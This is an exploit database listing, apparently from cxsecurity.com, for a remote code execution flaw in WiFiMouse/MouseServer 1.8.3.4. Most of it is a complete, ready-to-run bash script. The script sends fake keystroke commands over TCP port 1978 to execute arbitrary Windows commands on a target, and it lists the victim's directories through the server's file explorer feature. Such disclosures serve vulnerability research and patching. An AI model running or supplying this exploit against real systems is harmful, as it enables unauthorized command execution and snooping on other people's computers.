WiFiMouse 1.8.3.4 Remote Code Execution

2022.09.22
Credit: Febin Mon Saji
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.4 # Tested on: Windows 10 #!/bin/bash printf " WiFiMouse / MouseServer 1.8.3.4 Exploit by FEBIN " printf "[*] Enter the Target IP Address: " read TARGET rce(){ printf "[*] Enter the Command to execute on the Target: " read CMD sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 } dirlist(){ echo "[*] User's Home Directory Contents:" echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2- while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done } printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist else echo "[-] Invalid Choice!" fi


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top